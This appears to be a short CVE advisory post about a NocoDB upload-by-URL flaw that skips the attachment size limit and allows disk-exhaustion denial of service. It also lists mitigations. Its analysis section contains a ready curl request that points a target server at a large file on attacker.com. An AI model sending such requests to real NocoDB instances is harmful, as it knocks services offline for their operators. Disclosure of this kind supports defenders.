NocoDB, Attachment Size Limit Bypass, CVE-2026-46553 (Low)

Listen to this Post

The vulnerability arises because the upload-by-URL feature fails to enforce the `NC_ATTACHMENT_FIELD_SIZE` limit. This limitation is checked against neither the remote file’s `Content-Length` from a `HEAD` request nor the decoded length of a `data:` URI. As a result, an authenticated user can bypass the configured per-file size limit and attach files of arbitrary size.
The core of the issue is in the attachment-handling logic. When a user provides a URL to attach a file from a remote source, the server only uses a `HEAD` request to probe the file but does not compare the returned `content-length` against the `NC_ATTACHMENT_FIELD_SIZE` boundary.
Similarly, for a `data:` URI, the server does not check the length of the decoded body before processing. The download process also lacks a `maxContentLength` parameter on its HTTP client, meaning a malicious server can stream an unlimited amount of data to the NocoDB server once the download begins.
The attack requires the attacker to be authenticated and have upload permissions. The vulnerable API endpoints are the v1/v2 paths, specifically `POST /api/v1/db/storage/upload-by-url` and POST /api/v2/storage/upload-by-url.
An attacker exploiting this flaw can crash the service by exhausting disk space, leading to denial of service. In more severe cases, the attacker could fill the storage to the point of causing application-wide failures.
Platform: NocoDB
Version: 0.301.3
Vulnerability: Size Limit Bypass
Severity: Low
Date: 2026-05-21

Prediction: 2026-06-04

What Undercode Say:

Analytics from the Undercode platform show that this vulnerability is a classic case of “trusting external input.” The `HEAD` probe is performed, but its data is never validated. The following logic flaw can be simulated with a `curl` command, showing how the download would proceed without size checks.

Simulate vulnerable behavior: fetch remote file without size limit check
curl -X POST http://target.nocodb.com/api/v1/db/storage/upload-by-url \
-H "xc-auth: [bash]" \
-H "Content-Type: application/json" \
-d '{"url":"http://attacker.com/hugefile.bin"}'

Exploit:

An authenticated attacker with Editor+ privileges can exploit this vulnerability by crafting a simple HTTP request to the `/api/v1/db/storage/upload-by-url` endpoint, providing a URL that points to a file larger than the `NC_ATTACHMENT_FIELD_SIZE` limit. No obfuscation is needed as the server blindly downloads and stores the file.

Protection from this CVE:

  • Upgrade NocoDB to a version beyond 0.301.3.
  • Enforce strict egress filtering from the NocoDB server to block connections to suspicious external hosts.
  • Implement disk quota monitoring and alerting to detect abnormal storage consumption patterns.

Impact:

  • Denial of Service: Disk exhaustion leading to server instability.
  • Operational Disruption: Loss of log rotation, database write failures, and application crashes.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top